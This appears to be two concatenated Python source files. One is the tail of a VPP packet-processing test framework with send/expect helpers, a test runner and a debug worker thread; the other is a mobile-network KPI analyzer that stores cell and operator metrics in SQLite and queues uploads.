self.assert_checksum_valid(received_packet, 'ICMP')
self.assert_embedded_icmp_checksum_valid(received_packet)
def assert_icmpv6_checksum_valid(self, pkt):
if pkt.haslayer(ICMPv6DestUnreach):
self.assert_checksum_valid(pkt, 'ICMPv6DestUnreach', 'cksum')
self.assert_embedded_icmp_checksum_valid(pkt)
if pkt.haslayer(ICMPv6EchoRequest):
self.assert_checksum_valid(pkt, 'ICMPv6EchoRequest', 'cksum')
if pkt.haslayer(ICMPv6EchoReply):
self.assert_checksum_valid(pkt, 'ICMPv6EchoReply', 'cksum')
def get_packet_counter(self, counter):
if counter.startswith("/"):
counter_value = self.statistics.get_counter(counter)
else:
counters = self.vapi.cli("sh errors").split('\n')
counter_value = 0
for i in range(1, len(counters) - 1):
results = counters[i].split()
if results[1] == counter:
counter_value = int(results[0])
break
return counter_value
def assert_packet_counter_equal(self, counter, expected_value):
counter_value = self.get_packet_counter(counter)
self.assert_equal(counter_value, expected_value,
"packet counter `%s'" % counter)
def assert_error_counter_equal(self, counter, expected_value):
counter_value = self.statistics[counter].sum()
self.assert_equal(counter_value, expected_value,
"error counter `%s'" % counter)
@classmethod
def sleep(cls, timeout, remark=None):
# /* Allow sleep(0) to maintain win32 semantics, and as decreed
# * by Guido, only the main thread can be interrupted.
# */
# https://github.com/python/cpython/blob/6673decfa0fb078f60587f5cb5e98460eea137c2/Modules/timemodule.c#L1892 # noqa
if timeout == 0:
# yield quantum
if hasattr(os, 'sched_yield'):
os.sched_yield()
else:
time.sleep(0)
return
cls.logger.debug("Starting sleep for %es (%s)", timeout, remark)
before = time.time()
time.sleep(timeout)
after = time.time()
if after - before > 2 * timeout:
cls.logger.error("unexpected self.sleep() result - "
"slept for %es instead of ~%es!",
after - before, timeout)
cls.logger.debug(
"Finished sleep (%s) - slept %es (wanted %es)",
remark, after - before, timeout)
def pg_send(self, intf, pkts, worker=None, trace=True):
intf.add_stream(pkts, worker=worker)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start(trace=trace)
def send_and_assert_no_replies(self, intf, pkts, remark="", timeout=None):
self.pg_send(intf, pkts)
if not timeout:
timeout = 1
for i in self.pg_interfaces:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured(remark=remark)
timeout = 0.1
def send_and_expect(self, intf, pkts, output, n_rx=None, worker=None,
trace=True):
if not n_rx:
n_rx = len(pkts)
self.pg_send(intf, pkts, worker=worker, trace=trace)
rx = output.get_capture(n_rx)
return rx
def send_and_expect_only(self, intf, pkts, output, timeout=None):
self.pg_send(intf, pkts)
rx = output.get_capture(len(pkts))
outputs = [output]
if not timeout:
timeout = 1
for i in self.pg_interfaces:
if i not in outputs:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured()
timeout = 0.1
return rx
def get_testcase_doc_name(test):
return getdoc(test.__class__).splitlines()[0]
def get_test_description(descriptions, test):
short_description = test.shortDescription()
if descriptions and short_description:
return short_description
else:
return str(test)
class TestCaseInfo(object):
def __init__(self, logger, tempdir, vpp_pid, vpp_bin_path):
self.logger = logger
self.tempdir = tempdir
self.vpp_pid = vpp_pid
self.vpp_bin_path = vpp_bin_path
self.core_crash_test = None
class VppTestResult(unittest.TestResult):
"""
@property result_string
String variable to store the test case result string.
@property errors
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test which
raised an unexpected exception.
@property failures
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test where
a failure was explicitly signalled using the TestCase.assert*()
methods.
"""
failed_test_cases_info = set()
core_crash_test_cases_info = set()
current_test_case_info = None
def __init__(self, stream=None, descriptions=None, verbosity=None,
runner=None):
"""
:param stream File descriptor to store where to report test results.
Set to the standard error stream by default.
:param descriptions Boolean variable to store information if to use
test case descriptions.
:param verbosity Integer variable to store required verbosity level.
"""
super(VppTestResult, self).__init__(stream, descriptions, verbosity)
self.stream = stream
self.descriptions = descriptions
self.verbosity = verbosity
self.result_string = None
self.runner = runner
def addSuccess(self, test):
"""
Record a test succeeded result
:param test:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSuccess() %s.%s(%s) called" % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc))
unittest.TestResult.addSuccess(self, test)
self.result_string = colorize("OK", GREEN)
self.send_result_through_pipe(test, PASS)
def addSkip(self, test, reason):
"""
Record a test skipped.
:param test:
:param reason:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSkip() %s.%s(%s) called, reason is %s" %
(test.__class__.__name__, test._testMethodName,
test._testMethodDoc, reason))
unittest.TestResult.addSkip(self, test, reason)
self.result_string = colorize("SKIP", YELLOW)
self.send_result_through_pipe(test, SKIP)
def symlink_failed(self):
if self.current_test_case_info:
try:
failed_dir = os.getenv('FAILED_DIR')
link_path = os.path.join(
failed_dir,
'%s-FAILED' %
os.path.basename(self.current_test_case_info.tempdir))
self.current_test_case_info.logger.debug(
"creating a link to the failed test")
self.current_test_case_info.logger.debug(
"os.symlink(%s, %s)" %
(self.current_test_case_info.tempdir, link_path))
if os.path.exists(link_path):
self.current_test_case_info.logger.debug(
'symlink already exists')
else:
os.symlink(self.current_test_case_info.tempdir, link_path)
except Exception as e:
self.current_test_case_info.logger.error(e)
def send_result_through_pipe(self, test, result):
if hasattr(self, 'test_framework_result_pipe'):
pipe = self.test_framework_result_pipe
if pipe:
pipe.send((test.id(), result))
def log_error(self, test, err, fn_name):
if self.current_test_case_info:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = test.description
else:
test_name = '%s.%s(%s)' % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc)
self.current_test_case_info.logger.debug(
"--- %s() %s called, err is %s" %
(fn_name, test_name, err))
self.current_test_case_info.logger.debug(
"formatted exception is:\n%s" %
"".join(format_exception(*err)))
def add_error(self, test, err, unittest_fn, error_type):
if error_type == FAIL:
self.log_error(test, err, 'addFailure')
error_type_str = colorize("FAIL", RED)
elif error_type == ERROR:
self.log_error(test, err, 'addError')
error_type_str = colorize("ERROR", RED)
else:
raise Exception('Error type %s cannot be used to record an '
'error or a failure' % error_type)
unittest_fn(self, test, err)
if self.current_test_case_info:
self.result_string = "%s [ temp dir used by test case: %s ]" % \
(error_type_str,
self.current_test_case_info.tempdir)
self.symlink_failed()
self.failed_test_cases_info.add(self.current_test_case_info)
if is_core_present(self.current_test_case_info.tempdir):
if not self.current_test_case_info.core_crash_test:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = str(test)
else:
test_name = "'{!s}' ({!s})".format(
get_testcase_doc_name(test), test.id())
self.current_test_case_info.core_crash_test = test_name
self.core_crash_test_cases_info.add(
self.current_test_case_info)
else:
self.result_string = '%s [no temp dir]' % error_type_str
self.send_result_through_pipe(test, error_type)
def addFailure(self, test, err):
"""
Record a test failed result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addFailure, FAIL)
def addError(self, test, err):
"""
Record a test error result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addError, ERROR)
def getDescription(self, test):
"""
Get test description
:param test:
:returns: test description
"""
return get_test_description(self.descriptions, test)
def startTest(self, test):
"""
Start a test
:param test:
"""
def print_header(test):
test_doc = getdoc(test)
if not test_doc:
raise Exception("No doc string for test '%s'" % test.id())
test_title = test_doc.splitlines()[0]
test_title_colored = colorize(test_title, GREEN)
if test.is_tagged_run_solo():
# long live PEP-8 and 80 char width limitation...
c = YELLOW
test_title_colored = colorize("SOLO RUN: " + test_title, c)
# This block may overwrite the colorized title above,
# but we want this to stand out and be fixed
if test.has_tag(TestCaseTag.FIXME_VPP_WORKERS):
c = RED
w = "FIXME with VPP workers: "
test_title_colored = colorize(w + test_title, c)
if not hasattr(test.__class__, '_header_printed'):
print(double_line_delim)
print(test_title_colored)
print(double_line_delim)
test.__class__._header_printed = True
print_header(test)
self.start_test = time.time()
unittest.TestResult.startTest(self, test)
if self.verbosity > 0:
self.stream.writeln(
"Starting " + self.getDescription(test) + " ...")
self.stream.writeln(single_line_delim)
def stopTest(self, test):
"""
Called when the given test has been run
:param test:
"""
unittest.TestResult.stopTest(self, test)
if self.verbosity > 0:
self.stream.writeln(single_line_delim)
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.stream.writeln(single_line_delim)
else:
self.stream.writeln("%-68s %4.2f %s" %
(self.getDescription(test),
time.time() - self.start_test,
self.result_string))
self.send_result_through_pipe(test, TEST_RUN)
def printErrors(self):
"""
Print errors from running the test case
"""
if len(self.errors) > 0 or len(self.failures) > 0:
self.stream.writeln()
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
# ^^ that is the last output from unittest before summary
if not self.runner.print_summary:
devnull = unittest.runner._WritelnDecorator(open(os.devnull, 'w'))
self.stream = devnull
self.runner.stream = devnull
def printErrorList(self, flavour, errors):
"""
Print error list to the output stream together with error type
and test case description.
:param flavour: error type
:param errors: iterable errors
"""
for test, err in errors:
self.stream.writeln(double_line_delim)
self.stream.writeln("%s: %s" %
(flavour, self.getDescription(test)))
self.stream.writeln(single_line_delim)
self.stream.writeln("%s" % err)
class VppTestRunner(unittest.TextTestRunner):
"""
A basic test runner implementation which prints results to standard error.
"""
@property
def resultclass(self):
"""Class maintaining the results of the tests"""
return VppTestResult
def __init__(self, keep_alive_pipe=None, descriptions=True, verbosity=1,
result_pipe=None, failfast=False, buffer=False,
resultclass=None, print_summary=True, **kwargs):
# ignore stream setting here, use hard-coded stdout to be in sync
# with prints from VppTestCase methods ...
super(VppTestRunner, self).__init__(sys.stdout, descriptions,
verbosity, failfast, buffer,
resultclass, **kwargs)
KeepAliveReporter.pipe = keep_alive_pipe
self.orig_stream = self.stream
self.resultclass.test_framework_result_pipe = result_pipe
self.print_summary = print_summary
def _makeResult(self):
return self.resultclass(self.stream,
self.descriptions,
self.verbosity,
self)
def run(self, test):
"""
Run the tests
:param test:
"""
faulthandler.enable() # emit stack trace to stderr if killed by signal
result = super(VppTestRunner, self).run(test)
if not self.print_summary:
self.stream = self.orig_stream
result.stream = self.orig_stream
return result
class Worker(Thread):
def __init__(self, executable_args, logger, env=None, *args, **kwargs):
super(Worker, self).__init__(*args, **kwargs)
self.logger = logger
self.args = executable_args
if hasattr(self, 'testcase') and self.testcase.debug_all:
if self.testcase.debug_gdbserver:
self.args = ['/usr/bin/gdbserver', 'localhost:{port}'
.format(port=self.testcase.gdbserver_port)] + args
elif self.testcase.debug_gdb and hasattr(self, 'wait_for_gdb'):
self.args.append(self.wait_for_gdb)
self.app_bin = executable_args[0]
self.app_name = os.path.basename(self.app_bin)
if hasattr(self, 'role'):
self.app_name += ' {role}'.format(role=self.role)
self.process = None
self.result = None
env = {} if env is None else env
self.env = copy.deepcopy(env)
def wait_for_enter(self):
if not hasattr(self, 'testcase'):
return
if self.testcase.debug_all and self.testcase.debug_gdbserver:
print()
print(double_line_delim)
print("Spawned GDB Server for '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
elif self.testcase.debug_all and self.testcase.debug_gdb:
print()
print(double_line_delim)
print("Spawned '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
else:
return
print(single_line_delim)
print("You can debug '{app}' using:".format(app=self.app_name))
if self.testcase.debug_gdbserver:
print("sudo gdb " + self.app_bin +
" -ex 'target remote localhost:{port}'"
.format(port=self.testcase.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume from "
"within gdb by issuing the 'continue' command")
self.testcase.gdbserver_port += 1
elif self.testcase.debug_gdb:
print("sudo gdb " + self.app_bin +
" -ex 'attach {pid}'".format(pid=self.process.pid))
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
def run(self):
executable = self.args[0]
if not os.path.exists(executable) or not os.access(
executable, os.F_OK | os.X_OK):
# Exit code that means some system file did not exist,
# could not be opened, or had some other kind of error.
self.result = os.EX_OSFILE
raise EnvironmentError(
"executable '%s' is not found or executable." % executable)
self.logger.debug("Running executable: '{app}'"
.format(app=' '.join(self.args)))
env = os.environ.copy()
env.update(self.env)
env["CK_LOG_FILE_NAME"] = "-"
self.process = subprocess.Popen(
self.args, shell=False, env=env, preexec_fn=os.setpgrp,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.wait_for_enter()
out, err = self.process.communicate()
self.logger.debug("Finished running `{app}'".format(app=self.app_name))
self.logger.info("Return code is `%s'" % self.process.returncode)
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stdout:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(out.decode('utf-8'))
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stderr:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(err.decode('utf-8'))
self.logger.info(single_line_delim)
self.result = self.process.returncode
if __name__ == '__main__':
pass
|
kpi_analyzer.py
|
#!/usr/bin/python
# Filename: kpi_analyzer.py
"""
kpi_analyzer.py
An abstraction for KPI analyzer
Author: Yuanjie Li
"""
is_android = False
try:
from jnius import autoclass # For Android
try:
from service import mi2app_utils
PythonService = autoclass('org.kivy.android.PythonService')
pyService = PythonService.mService
Context = autoclass('android.content.Context')
ConnectivityManager = pyService.getSystemService(Context.CONNECTIVITY_SERVICE)
except Exception as e:
import main_utils
is_android = True
except Exception as e:
import sqlite3 # Laptop version
is_android = False
__all__ = ["KpiAnalyzer"]
from ..analyzer import *
# from .track_cell_info_analyzer import TrackCellInfoAnalyzer
import os, errno
import urllib.request, urllib.error, urllib.parse, json, time, datetime
import threading
from collections import deque
class KpiAnalyzer(Analyzer):
"""
An abstraction for KPI analyzer. It offers three functions
(1) Helpers to simplify the development of KPI tracking
(2) Automation of the KPI local storage management
(3) Automation of the KPI uploading to KPI map (cloud).
"""
# Global variables: For asynchrounous KPI upload
upload_thread = None
pending_upload_task = deque([]) # (kpi_name, kpi_val) pair list
def __init__(self):
Analyzer.__init__(self)
self.include_analyzer('TrackCellInfoAnalyzer', [])
# initilize local database
self.supported_kpis = {} # Supported KPIs: kpi_name -> callback
self.__db = None # Local dabatase: kpi_name -> database
self.__conn = None # Local database cursor: kpi_name -> database
self.__op = ""
self.__phone_model = ""
self.__db_enabled = False
self.__periodicity = {}
self.__logcell = {}
self.__last_updated = {}
# Initialize uploading thread
if is_android and not KpiAnalyzer.upload_thread:
e = threading.Event()
KpiAnalyzer.upload_thread = threading.Thread(target=self.__upload_kpi_thread, args=(e,))
KpiAnalyzer.upload_thread.start()
def __del__(self):
if is_android:
mi2app_utils.detach_thread()
def enable_local_storage(self, enable_storage):
"""
Set if the local KPI should be stored
:param enable_storage: Whether to locally store the kpi. False by default
:type enable_storage: boolean
"""
self.__db_enabled = enable_storage
def register_kpi(self, kpi_type, kpi_name, callback, attributes = None):
"""
Declare a KPI to be supported
:param kpi_type: The type of the KPI (accessibility, retainability, mobility, availability, ...)
:type kpi_type: string
:param kpi_name: The name of the KPI
:type kpi_name: string
:param callback: The callbacks to update the KPI
:type kpi_name: Python method
:returns: True if the registeration succeeds, False otherwise (e.g., KPI already exists)
:param attributes:
:type attributes: None or a list of attributes
"""
full_name = 'KPI.'+kpi_type+'.'+kpi_name
if full_name in self.supported_kpis:
# KPI already exists
return False
self.supported_kpis[full_name] = callback
if not (self.__db and self.__conn):
if not self.__create_db():
self.log_info("Create database failed")
return False
if not self.__create_table(full_name, attributes):
return False
return True
def __create_table(self, kpi_name, attributes):
'''
Create SQL tables for the kpi
:param kpi_name: name of the kpi
:type kpi_name: string
:param attributes:
:type attributes: None or a list of attributes
'''
kpi_name = kpi_name.replace('.', '_')
if attributes:
sql_cmd = 'CREATE TABLE IF NOT EXISTS ' + \
kpi_name + "(id integer primary key autoincrement, "
for attribute in attributes:
sql_cmd += (str(attribute) + ' text, ')
sql_cmd += "timestamp timestamp, op text, phone_model text," \
"gps text, cell_id text, tai_id text, dl_freq text, ul_freq text, dl_bw text, ul_bw text," \
"allowed_access text, band_id text)"
else:
sql_cmd = 'CREATE TABLE IF NOT EXISTS ' + \
kpi_name + "(id integer primary key autoincrement, value text, timestamp timestamp, op text, phone_model text," \
"gps text, cell_id text, tai_id text, dl_freq text, ul_freq text, dl_bw text, ul_bw text," \
"allowed_access text, band_id text)"
# print sql_cmd
# for rrc_sr, it may have several types, shall we build a table for each types?
if is_android:
self.__db.execSQL(sql_cmd)
else:
self.__db.execute(sql_cmd)
self.__conn.commit()
def __create_db(self):
"""
Create a local database for the KPI.
The database is stored at /sdcard/mobileinsight/kpi/
:returns: True if the database is successfully created (or already exists), False otherwise
"""
db_name = "Kpi"
try:
if is_android:
Environment = autoclass("android.os.Environment")
state = Environment.getExternalStorageState()
if not Environment.MEDIA_MOUNTED == state:
self.__db = None
return
sdcard_path = Environment.getExternalStorageDirectory().toString()
DB_PATH = os.path.join(sdcard_path, "mobileinsight/dbs")
activity = autoclass('org.kivy.android.PythonActivity')
if activity.mActivity:
self.__db = activity.mActivity.openOrCreateDatabase(
os.path.join(DB_PATH, db_name + '.db'), 0, None)
else:
service = autoclass('org.kivy.android.PythonService')
self.__db = service.mService.openOrCreateDatabase(
os.path.join(DB_PATH, db_name + '.db'), 0, None)
else:
try:
os.makedirs('./dbs/')
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
self.__conn = sqlite3.connect('./dbs/' + db_name + '.db')
self.__db = self.__conn.cursor()
return True
except BaseException: # TODO: raise warnings
return False
def list_kpis(self):
"""
Return a list of available KPIs
:returns: a list of string, each of which is a KPI name
"""
return list(self.supported_kpis.keys())
def __db_query(self, sql_cmd):
"""
Return query result of a sql_cmd
"""
try:
if is_android:
sql_res = self.__db.rawQuery(sql_cmd, None)
else:
sql_res = self.__db.execute(sql_cmd).fetchall()
# print sql_res
# if sql_res.getCount()==0: #the id does not exist
if (is_android and sql_res.getCount() == 0) or (
not is_android and len(sql_res) == 0):
return None
if is_android:
sql_res.moveToFirst()
# convert string to dictionary
res = sql_res.getString(0)
else:
res = sql_res[0][0]
return res
except BaseException: # TODO: raise warnings
return None
def local_query_kpi(self, kpi_name, cell_id = None, timestamp = None):
"""
Query the phone's locally observed KPI
:param kpi_name: The KPI to be queried
:type kpi_name: string
:param cell_id: cell global id
:type cell_id: string
:param timestamp: The timestamp of the KPI. If None, this function returns the latest KPI
:type timestamp: datetime
:returns: The KPI value, or None if the KPI is not available
"""
if not self.__db_enabled:
self.log_warning("Database is not enabled.")
return None
# cell_id = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_cell_id()
# cell_id = cell_id if cell_id else None
kpi_name = kpi_name.replace('.', '_')
# print kpi_name
if kpi_name.endswith('SR'):
if cell_id:
if 'HO' in kpi_name:
kpi_suc = kpi_name[:-2]+'FAILURE'
else:
kpi_suc = kpi_name[:-2]+'SUC'
if timestamp:
sql_cmd = "select count(*) from " + kpi_suc + " where timestamp<\"" + \
str(timestamp) + "\" and cell_id=\"" + str(cell_id) +"\""
else:
sql_cmd = "select count(*) from " + kpi_suc + " where cell_id=\"" + str(cell_id) +"\""
# print sql_cmd
suc_num = self.__db_query(sql_cmd)
if 'HO' in kpi_name:
kpi_req = kpi_name[:-2]+'TOTAL'
else:
kpi_req = kpi_name[:-2]+'REQ'
if timestamp:
sql_cmd = "select count(*) from " + kpi_req + " where timestamp<\"" + \
str(timestamp) + "\" and cell_id=\"" + str(cell_id) +"\""
else:
sql_cmd = "select count(*) from " + kpi_req + " where cell_id=\"" + str(cell_id) +"\""
# print sql_cmd
req_num = self.__db_query(sql_cmd)
else:
if 'HO' in kpi_name:
kpi_suc = kpi_name[:-2]+'FAILURE'
else:
kpi_suc = kpi_name[:-2]+'SUC'
if timestamp:
sql_cmd = "select count(*) from " + kpi_suc + " where timestamp<\"" + \
str(timestamp) + "\""
else:
sql_cmd = "select count(*) from " + kpi_suc
# print sql_cmd
suc_num = self.__db_query(sql_cmd)
if 'HO' in kpi_name:
kpi_req = kpi_name[:-2]+'TOTAL'
else:
kpi_req = kpi_name[:-2]+'REQ'
if timestamp:
sql_cmd = "select count(*) from " + kpi_req + " where timestamp<\"" + \
str(timestamp) + "\""
else:
sql_cmd = "select count(*) from " + kpi_req
# print sql_cmd
req_num = self.__db_query(sql_cmd)
# print suc_num, req_num
if req_num and suc_num and int(req_num) > 0:
if 'HO' in kpi_name:
return '{:.2f}'.format(float(req_num - suc_num)/int(req_num)*100)+'%'
else:
return '{:.2f}'.format(float(suc_num)/int(req_num)*100)+'%'
return None
elif kpi_name.endswith('SUC') or kpi_name.endswith('REQ') or \
kpi_name.endswith('TOTAL') or kpi_name.endswith('FAILURE'):
if cell_id:
if timestamp:
sql_cmd = "select count(*) from " + kpi_name + " where timestamp<\"" + \
str(timestamp) + "\" and cell_id=\"" + str(cell_id) +"\""
else:
sql_cmd = "select count(*) from " + kpi_name + " where cell_id=\"" + str(cell_id) +"\""
else:
if timestamp:
sql_cmd = "select count(*) from " + kpi_name + " where timestamp<\"" + \
str(timestamp) + "\""
else:
sql_cmd = "select count(*) from " + kpi_name
# print sql_cmd
value = self.__db_query(sql_cmd)
if value:
return str(value)
return None
elif kpi_name.endswith('TPUT'):
if cell_id:
if timestamp:
sql_cmd = "select value from " + kpi_name + " where timestamp<\"" + \
str(timestamp) + "\" and cell_id=\"" + str(cell_id) +"\" order by id desc limit 1"
else:
sql_cmd = "select value from " + kpi_name + " where cell_id=\"" + \
str(cell_id) +"\" order by id desc limit 1"
else:
if timestamp:
sql_cmd = "select value from " + kpi_name + " where timestamp<\"" + \
str(timestamp) + "\" order by id desc limit 1"
else:
sql_cmd = "select value from " + kpi_name + " order by id desc limit 1"
# print sql_cmd
value = self.__db_query(sql_cmd)
if value:
return str(value)
return None
def remote_query_kpi(self, kpi_name, phone_model, operator, gps, timestamp):
"""
Query the remote cloud for the KPI
:param kpi_name: The KPI to be queried
:type kpi_name: string
:param phone_model: The the phone model
:type phone_model: string
:param operator: The network operator
:type operator: string
:param gps: The GPS coordinate
:type gps: string
:param timestamp: The timestamp of the KPI.
:type timestamp: datetime
:returns: The KPI value, or None if the KPI is not available
"""
#TODO: Implement the query of remote database
return None
def set_periodicity(self, kpi_showname, periodicity):
"""
Set periodicity of the analyzer
:param kpi_showname: The KPI to be queried, this is the showname
:type kpi_showname: string
:param periodicity: periodicity (s,m,h,d repsents scale of seconds, minutes, hours, days)
:type periodicity: string
"""
try:
kpi_name = kpi_showname.replace('.', '_')
if periodicity.isdigit():
self.__periodicity[kpi_name] = int(periodicity)
elif periodicity.endswith('s'):
self.__periodicity[kpi_name] = int(periodicity[:-1])
elif periodicity.endswith('m'):
self.__periodicity[kpi_name] = int(periodicity[:-1])*60
elif periodicity.endswith('h'):
self.__periodicity[kpi_name] = int(periodicity[:-1])*60*60
elif periodicity.endswith('d'):
self.__periodicity[kpi_name] = int(periodicity[:-1])*60*60*24
self.__last_updated[kpi_name] = None
self.log_info("Priority set for "+kpi_showname+': '+periodicity)
return True
except:
self.log_info("Priority set failed for "+kpi_showname+': '+periodicity)
return False
def set_cell(self, kpi_showname, cell):
"""
Set periodicity of the analyzer
:param kpi_showname: The KPI to be queried, this is the showname
:type kpi_showname: string
:param cell: cell (s,m,h,d repsents scale of seconds, minutes, hours, days)
:type cell: string
"""
try:
kpi_name = kpi_showname.replace('.', '_')
self.__logcell[kpi_name] = cell
self.log_info("Logging cell set for "+kpi_showname+': '+str(cell))
return True
except:
self.log_info("Logging cell failed for "+kpi_showname+': '+periodicity)
return False
def store_kpi(self, kpi_name, kpi_value, timestamp, cur_location=None):
"""
Store the KPIs to the local database
:param kpi_name: The KPI to be queried
:type kpi_name: string
:param kpi_value: The value of KPI or a dict {attribute <type: str>: value <type: str>}
:type kpi_value: string
:param timestamp
:type timestamp: datetime
"""
if not self.__db_enabled:
self.log_warning("Database is not enabled.")
return True
# try:
phone_info = self.__get_phone_model()
operator_info = self.__get_operator_info()
# cur_location = self.__get_current_gps()
cell_id = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_cell_id()
cell_id = cell_id if cell_id else "None"
tac = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_cell_tac()
tac = tac if tac else "None"
downlink_frequency = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_downlink_frequency()
downlink_frequency = downlink_frequency if downlink_frequency else "None"
uplink_frequency = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_uplink_frequency()
uplink_frequency = uplink_frequency if uplink_frequency else "None"
downlink_bandwidth = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_downlink_bandwidth()
downlink_bandwidth = downlink_bandwidth if downlink_bandwidth else "None"
uplink_bandwidth = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_uplink_bandwidth()
uplink_bandwidth = uplink_bandwidth if uplink_bandwidth else "None"
allowed_access = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_allowed_access()
allowed_access = allowed_access if allowed_access else "None"
band_indicator = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_band_indicator()
band_indicator = band_indicator if band_indicator else "None"
#FIXME: How to handle the missing GPS location?
if not cur_location:
cur_location = ("None", "None")
if isinstance(kpi_value, str) or isinstance(kpi_value, int) or isinstance(kpi_value, float):
sql_cmd = "insert into " + kpi_name + "(value, timestamp," \
"op, phone_model, gps, cell_id, tai_id, dl_freq, ul_freq, dl_bw, ul_bw," \
"allowed_access, band_id) values(\"" + \
str(kpi_value) + "\"," + "\"" + str(timestamp) \
+ "\"," + "\"" + operator_info \
+ "\"," + "\"" + phone_info \
+ "\"," + "\"" + str(cur_location[0])+"|"+str(cur_location[1]) \
+ "\"," + "\"" + str(cell_id) \
+ "\"," + "\"" + str(tac) \
+ "\"," + "\"" + str(downlink_frequency) \
+ "\"," + "\"" + str(uplink_frequency) \
+ "\"," + "\"" + str(downlink_bandwidth) \
+ "\"," + "\"" + str(uplink_bandwidth) \
+ "\"," + "\"" + str(allowed_access) \
+ "\"," + "\"" + str(band_indicator) \
+ "\")"
else:
idx_str = ""
value_str = ""
for attribute in kpi_value:
idx_str += (attribute + ', ')
value_str += ("\"" + str(kpi_value[attribute]) + "\"," )
sql_cmd = "insert into " + kpi_name + "(" + idx_str + \
" timestamp, op, phone_model, gps, cell_id, tai_id, dl_freq, ul_freq, dl_bw, ul_bw," \
"allowed_access, band_id) values(" + value_str + "\""+ str(timestamp) \
+ "\"," + "\"" + operator_info \
+ "\"," + "\"" + phone_info \
+ "\"," + "\"" + str(cur_location[0])+"|"+str(cur_location[1]) \
+ "\"," + "\"" + str(cell_id) \
+ "\"," + "\"" + str(tac) \
+ "\"," + "\"" + str(downlink_frequency) \
+ "\"," + "\"" + str(uplink_frequency) \
+ "\"," + "\"" + str(downlink_bandwidth) \
+ "\"," + "\"" + str(uplink_bandwidth) \
+ "\"," + "\"" + str(allowed_access) \
+ "\"," + "\"" + str(band_indicator) \
+ "\")"
# print(sql_cmd)
if is_android:
self.__db.execSQL(sql_cmd)
else:
self.__db.execute(sql_cmd)
self.__conn.commit()
self.__log_kpi(kpi_name, timestamp, cell_id, kpi_value)
return True
# except BaseException: # TODO: raise warnings
# return False
def __log_kpi(self, kpi_name, timestamp, cell_id, kpi_value):
"""
:param kpi_name: The KPI to be queried
:type kpi_name: string
:param timestamp
:type timestamp: datetime
:param cell_id: updated kpi cell id
:type cell_id: string
"""
if kpi_name in self.__last_updated:
# if logging cell is specified, check whether cell id are the same
if not self.__logcell[kpi_name] or self.__logcell[kpi_name] and self.__logcell[kpi_name] == str(cell_id):
kpi_showname = kpi_name.replace('_', '.')
# if periodicity mode enabled, check whether time gap is longer enough
if not self.__last_updated[kpi_name] or (timestamp - self.__last_updated[kpi_name]).total_seconds() > self.__periodicity[kpi_name]:
self.__last_updated[kpi_name] = timestamp
if kpi_name.endswith('_LOSS') or kpi_name.endswith('_BLER'):
self.log_info(str(timestamp) + ': '+ str(kpi_showname) + '=' + str(kpi_value) + '%')
elif kpi_name.endswith('_TPUT'):
self.log_info(str(timestamp) + ': '+ str(kpi_showname) + '=' + str(kpi_value) + 'bps')
elif kpi_name.endswith('_LATENCY') or kpi_name.endswith('_HOL'):
self.log_info(str(timestamp) + ': '+ str(kpi_showname) + '=' + str(kpi_value) + 'ms')
elif kpi_name.endswith('_PREDICTION'):
self.log_info(str(timestamp) + ': '+ str(kpi_showname) + '=Triggered')
else:
self.log_info(str(timestamp) + ': '+ str(kpi_showname) + '=' + str(self.local_query_kpi(kpi_name)))
# check the stats updated with instance value
if kpi_name.endswith('SUC') or kpi_name.endswith('FAILURE'):
kpi_name=kpi_name.replace('SUC', 'SR')
kpi_name=kpi_name.replace('FAILURE', 'SR')
if kpi_name in self.__last_updated:
if not self.__logcell[kpi_name] or self.__logcell[kpi_name] and self.__logcell[kpi_name] == str(cell_id):
kpi_showname = kpi_name.replace('_', '.')
if not self.__last_updated[kpi_name] or (timestamp - self.__last_updated[kpi_name]).total_seconds() > self.__periodicity[kpi_name]:
self.__last_updated[kpi_name] = timestamp
kpi_showname = kpi_name.replace('_', '.')
self.log_info(str(timestamp) + ': '+ str(kpi_showname) + '=' + str(self.local_query_kpi(kpi_name)))
def __upload_kpi_thread(self,e):
"""
Internal thread to upload the KPI
"""
while True:
if KpiAnalyzer.pending_upload_task:
while True:
activeNetworkInfo = ConnectivityManager.getActiveNetworkInfo()
if activeNetworkInfo and activeNetworkInfo.isConnected():
break
e.wait(1)
while KpiAnalyzer.pending_upload_task:
item = KpiAnalyzer.pending_upload_task.popleft()
# self.__upload_kpi_async(item[0],item[1])
while not self.__upload_kpi_async(item[0],item[1],item[2]):
e.wait(5)
e.wait(5)
